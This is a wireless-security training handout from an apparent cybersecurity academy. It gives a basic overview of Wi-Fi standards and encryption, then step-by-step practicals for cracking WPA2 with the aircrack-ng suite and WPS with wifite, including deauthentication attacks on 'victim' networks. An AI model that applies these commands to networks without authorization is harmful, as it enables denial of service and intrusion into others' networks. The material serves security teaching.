0% found this document useful (0 votes)
65 views6 pages

Wireless Attack

The document discusses wireless communication technology and wireless networks. It covers topics such as types of wireless technologies, wireless standards, wireless speed and range, wireless interference, and encryption methods. Wireless networks allow devices to connect without cables for flexibility and lower cost of setup.

Uploaded by

www.appilal
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
65 views6 pages

Wireless Attack

The document discusses wireless communication technology and wireless networks. It covers topics such as types of wireless technologies, wireless standards, wireless speed and range, wireless interference, and encryption methods. Wireless networks allow devices to connect without cables for flexibility and lower cost of setup.

Uploaded by

www.appilal
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 6

Table of contents

• Introduction
• Types
• Wireless Technology Standards
• Wireless Speed & Range
• Wireless Interference
• Encryption
• Methodology
• Summary

1|Page Texial Academy www.texial.net


+91 98866 55699 | +91 98866 00876
Texial Academy

Introduction

Wireless communication technology is a modern alternative to traditional wired networking


where wired networks rely on cables to connect digital devices together, wireless networks rely
on wireless technologies. This is widely used in both home and business computer networks for
a variety of uses. It allows to connect one or more devices such as printer so that you can share
files. Unlike a wired network in which you use ethernet cable to connect devices to the network
and communicate between them, a wireless network uses a radio signal, first a computer wireless
adapter changes the data into radio signals and then transmits these signals through the use of an
antenna. Then a wireless router receives the signal and decodes it. It then sends the information
through a wired Ethernet connection to the internet. This procedure also works backwards in
which the router receives information from the internet and sends it to the computer.

This freedom from ethernet cable gives a great flexibility to connect various devices, it allows
you to place any device capable of receiving wireless signals in convenient locations through out
your home or office without the expense and trouble of having to install ethernet cable access in
each location while being connected to the network as long as you are within the range of the
wireless router signal. The most essential elements of a wireless network are router and modem
while router creates a local area network and manages communication between all networked
devices and the modem connects to the router and provide the local area network with access to
the internet which is called a wide area network.

To access internet, we need internet service provider such as a local cable or a DSL, in order to
identify each device in the network and manage communication between them the router assigns
each device an IP like a home address is used to deliver a courier, these addresses allow the
router to know where to send information, the router itself has an IP called gateway address, it
comes preassigned by the manufacturer and does not change unless the owner change it. When
you set up a wireless network, you have the opportunity to give your network a unique name
different from the one assigned by the manufacturer and from your neighbor’s network as well.
A unique network name makes it easy to identify when you try to connect a wireless device to it
and keeps you from mistakenly joining another network and you need to set up a password in
order to limit unauthorized access, the encryption methods commonly available are WEP, WAP
and WAP2.

Wireless networks are cheap and easy to set up. You may access the internet from multiple
computers, laptops, handheld computers, and even mobile phones that have wifi just by having a
wireless router in your home or office. So now you don’t have to wait for your turn to use the
internet because it can be used at the same time on multiple devices by a single a connection.

2|Page Texial Academy www.texial.net


+91 98866 55699 | +91 98866 00876
Texial Academy

Types

A large number of technologies have been developed to support wireless networking in different
scenarios.

Mainstream wireless technologies include:

• WIFI ,especially popular in home networks and as a wireless hotspot technology


• Bluetooth, for low-power and embedded applications
• 4G and 3G cellular internet
• Wireless home automation standards like ZigBee and Z-Wave

Other technologies still under development but likely to play a role in wireless networks of the
future, include 5G cellular internet and Li-Fi visible light communication.

Wireless Technology Standards

The most common wireless technology standards include the following:

• 802.11b: The first widely used wireless networking technology, known as 802.11b (more
commonly called Wi-Fi), first debuted almost a decade ago, but is still in use.
• 802.11g: In 2003, a follow-on version called 802.11g appeared offering greater
performance (that is, speed and range) and remains today's most common wireless
networking technology.
• 802.11n: Another improved standard called 802.11n is currently under development and
is scheduled to be complete in 2009. But even though the 802.11n standard has yet to be
finalized, you can still buy products based on the draft 802.11n standard, which you will
be able to upgrade later to the final standard.

All of the Wi-Fi variants (802.11b, g and n products) use the same 2.4 GHz radio frequency, and
as a result are designed to be compatible with each other, so you can usually use devices based
on the different standards within the same wireless network. The catch is that doing so often
requires special configuration to accommodate the earlier devices, which in turn can reduce the
overall performance of the network. In an ideal scenario you'll want all your wireless devices, the
access point and all wireless-capable computers, to be using the same technology standard and to
be from the same vendor whenever possible.

Wireless Speed & Range

When you buy a piece of wireless network hardware, it will often quote performance figures
(i.e., how fast it can transmit data) based on the type of wireless networking standard it uses, plus

3|Page Texial Academy www.texial.net


+91 98866 55699 | +91 98866 00876
Texial Academy

any added technological enhancements. In truth, these performance figures are almost always
wildly optimistic.

While the official speeds of 802.11b, 802.11g, and 802.11n networks are 11, 54, and 270
megabits per second (Mbps) respectively, these figures represent a scenario that.s simply not
attainable in the real world. As a general rule, you should assume that in a best-case scenario
you.ll get roughly one-third of the advertised performance.

It's also worth noting that a wireless network is by definition a shared network, so the more
computers you have connected to a wireless access point the less data each will be able to send
and receive. Just as a wireless network's speed can vary greatly, so too can the range. For
example, 802.11b and g officially work over a distance of up to 328 feet indoors or 1,312 feet
outdoors, but the key term there is "up to". Chances are you won't see anywhere close to those
numbers.

As you might expect, the closer you are to an access point, the stronger the signal and the faster
the connection speed. The range and speed you get out of wireless network will also depend on
the kind of environment in which it operates

Wireless Interference

Interference is an issue with any form of radio communication, and a wireless network is no
exception. The potential for interference is especially great indoors, where different types of
building materials (concrete, wood, drywall, metal, glass and so on) can absorb or reflect radio
waves, affecting the strength and consistency of a wireless network's signal. Similarly, devices
like microwave ovens and some cordless phones can cause interference because they operate in
the same 2.4 frequency range as 802.11b/g/n networks. You can't avoid interference entirely, but
in most cases it's not significant enough to affect the usability of the network. When it does, you
can usually minimize the interference by relocating wireless networking hardware or using
specialized antennas.

Encryption

➢ WEP : wired equivalent privacy is an IEEE 802.11 wireless protocol which provides
security algorithm for data confidentiality during wireless transmission. It was developed
without the public not even got a review from cryptologist, it has significant
vulnerabilities and design flaws
➢ WAP : wifi protected access is a data encryption method for wlan’s based on 802.11
standards and it is been developed in response to the weaknesses of WEP. WPA provides
stronger encryption than WEP through use of either of two standard

4|Page Texial Academy www.texial.net


+91 98866 55699 | +91 98866 00876
Texial Academy

technologies: Temporal Key Integrity Protocol (TKIP) and Advanced Encryption


Standard (AES). WPA also includes built-in authentication support that WEP does not
offer.

WPA2: It provides enterprise and wifi users with stronger data protection and network access
network. It is a network security technology commonly used on wireless networks. It's an
upgrade from the original WPA technology, which was designed as a replacement for the older
and much less secure WEP. It is used on all certified Wi-Fi hardware since 2006 and is based on
the IEEE 802.11i technology standard for data encryption.

When WPA2 is enabled with its strongest encryption option, anyone else within range of the
network might be able to see the traffic but it will be scrambled with the most up-to-date
encryption standards.

Methodology

Practical 1: Cracking WPA2 passwords using aircrack-ng in Kali Linux

You need an external wireless adapter to perform this activities. Alfa wireless adapters are highly
recommended for this. Using your laptop integrated Wi-Fi can be dangerous.

1. Make sure to put your wireless interface down. Enter command in following syntax:

ifconfig <interface> down

For example:

ifconfig wlan0 down

2. Start the monitoring mode by using airmon-ng command:

airmon-ng start wlan0

3. Scan for available Wi-Fi networks in your area using airodump-ng:

airodump-ng wlan0mon

4. On your victim’s Wi-Fi start monitoring using airodump-ng:

airodump-ng wlan0mon –-bssid <MAC address of victim router> -c <channel no> -w <Location
and name of file>

5|Page Texial Academy www.texial.net


+91 98866 55699 | +91 98866 00876
Texial Academy

5. Start DOS attack on some connected device using aireplay-ng:

aireplay-ng wlan0mon -0 5 -a <MAC address of victim router> -c <MAC address of any client>

6. Once you get handshake, hit ctrl+c to stop monitoring, And now we need to crack the captured
password.

7. Crack the password via dictionary attack using aircrack-ng:

aircrack-ng <Location and name of capture file> -w <Location and name of dictionary file>

Practical 2: Cracking passwords using wifite in Kali Linux

You need an external wireless adapter to perform this activities. Alfa wireless adapters are highly
recommended for this. Using your laptop integrated Wi-Fi can be dangerous.

1. In Kali Linux terminal enter following command:

wifite –-wps

This is will detect and list all Wi-Fi networks in your area which has wps enabled.

2. Once you get the list then you can provide the serial number of the target Wi-Fi or you can
also enter “all” to start cracking them.

3. wifite will start multiple techniques of cracking wps pin. It may take some time.

4. Once it is able to get the password, it will be printed on screen n plain text.

Summary

Wireless network hardware supports several standard encryption schemes, but the most common
are Wired Equivalent Privacy, Wi-Fi Protected Access and Wi-Fi Protected Access 2 . WEP is
the oldest and least secure method and should be avoided. WPA and WPA2 are good choices,
but provide better protection when you use longer and more complex passwords (all devices on a
wireless network must use the same kind of encryption and be configured with the same
password). Unless you intend to provide public access to your wireless network and put your
business data or your own personal data at risk you should consider encryption mandatory.

6|Page Texial Academy www.texial.net


+91 98866 55699 | +91 98866 00876

You might also like